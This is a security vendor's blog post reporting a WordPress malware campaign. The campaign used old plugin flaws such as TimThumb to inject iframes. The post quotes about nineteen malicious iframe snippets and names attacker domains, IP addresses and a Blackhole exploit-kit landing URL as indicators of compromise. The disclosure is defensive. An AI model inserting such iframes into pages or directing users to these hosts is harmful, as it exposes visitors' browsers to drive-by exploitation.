Malware campaign against WordPress sites (recovery-hdd dot eu)

We have been tracking a new malware campaign that has been compromising thousands of WordPress sites over the last 3 days. They are not doing anything new, but using old vulnerabilities in plugins and themes, specially TimThumb, to add iframes to as many sites they can. Unfortunately, they have been very successful so far.

They are using many domains, but the most common one is recovery-hdd.eu, followed by almazzao-co.eu, hence the name of the campaign.

Another tactic they are using is hijacked domain names from legitimate sites and free domain registration services to host their malware (at domain.com/images.php?t=44443094 for the iframe url).

Here are some of the iframes we are seeing they using lately:

<iframe src="http://recovery-hdd.eu/in.cgi?6" ..

<iframe src="http://almazzao-co.eu/in.cgi?6" ..

<iframe src="http://sddr.margarit.in/images.php?t=44443094" ..

<iframe src="http://sds.valerito.in/images.php?t=44443094" ..

<iframe src="http://xsw.vedeved.in/images.php?t=44443094" ..

<iframe src="http://ewpou.mldk.org/images.php?t=44443094..

<iframe src="http://ozclz.mldk.org/images.php?t=44443094..

<iframe src="http://gaziy.fohra.com/images.php?t=44443094..

<iframe src="http://sdc.hdljca.in/images.php?t=44443094..

<iframe src="http://sds.vaselisa.in/images.php?t=44443094..

<iframe src="http://cjuyr.tetuku.com/images.php?t=44443094..

<iframe src="http://rycqn.info.tm/images.php?t=44443094..

<iframe src="http://xtqhe.biz.tm/images.php?t=44443094..

<iframe src="http://ljpyy.us.to/images.php?t=44443094..

<iframe src="http://zboar.us.to/images.php?t=44443094..

<iframe src="http://udgjf.dnepr.com/images.php?t=44443094..

<iframe src="http://gmtiz.whynotad.com/images.php?t=44443094..

<iframe src="http://wdbid.dnepr.com/images.php?t=44443094..

<iframe src="http://asqmh.byte4byte.com/images.php?t=44443094..

Malicious Iframes?

These iframes redirect anyone that visits a compromised site to secondary domains where they try to attack the user browser using the Blackhole Exploit kit. So if you have outdated Java, Flash, browser or Adobe PDF reader, you can get compromised by just visiting those hacked sites.

Right now, this is their main secondary domain:

http://boardnewterra.eu/dasdasaseq.php?page=8a7598e3b9c768db ( 37.59.188.162 )

Malware details

All the main domain names so far have been hosted at 109.236.80.230 and 37.59.188.162, and are using random Whois names (Oleg Kilosov, Lapchenkov Oleg, Azurov Ilia, etc). Also, they are registering new domains daily. recovery-hdd.eu was registered on April 23, almazzao-co.eu on April 24, and boardnewterra.eu on April 24th.

How many sites infected?

Google is not blacklisting any of these domains yet. We also noticed that they are conditional (only being displayed to Windows user agents), so it is not indexed by Google bot.

However, just via our scans, we have identified 1,372 different sites with the recovery-hdd.eu iframe, 742 with the almazzao-co.eu, and 3,587 with a variety of the “/images.php?t=44443094″ iframes. That’s more than 5 thousand sites infected in the last 3 days with the same type of malware. We are estimating the number of compromised sites is at least 4 or 5 times bigger.

We are still monitoring them (since it just started a few days ago), but we will post more details we are learn more about it.


If your site is compromised, sitecheck would identify and alert on it: Sucuri SiteCheck. We recommend checking your sites in there (free).

Scan your website for free:
About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site dcid.me or on Twitter: @danielcid